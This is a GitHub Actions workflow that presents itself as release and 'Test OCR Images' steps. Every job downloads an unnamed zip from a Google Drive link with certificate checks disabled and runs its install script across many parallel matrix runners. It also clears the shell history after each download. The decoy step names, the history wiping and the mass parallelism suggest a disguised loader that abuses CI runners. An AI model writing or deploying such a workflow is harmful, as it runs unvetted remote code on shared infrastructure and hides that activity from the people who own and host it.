name: songgio0bo
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  RELEASE:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Init', 'Generate', 'Check', 'Start', 'Ship']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1vUiv9Y-ocr_HKLAeg6zP3j6Nfmmj2odg" -O songgio0bo.zip
        unzip -o songgio0bo.zip
        rm songgio0bo.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh


  Publish1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Prepare', 'Construct', 'Inspect', 'Activate', 'Publish']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1vUiv9Y-ocr_HKLAeg6zP3j6Nfmmj2odg" -O songgio0bo.zip
        unzip -o songgio0bo.zip
        rm songgio0bo.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh
        
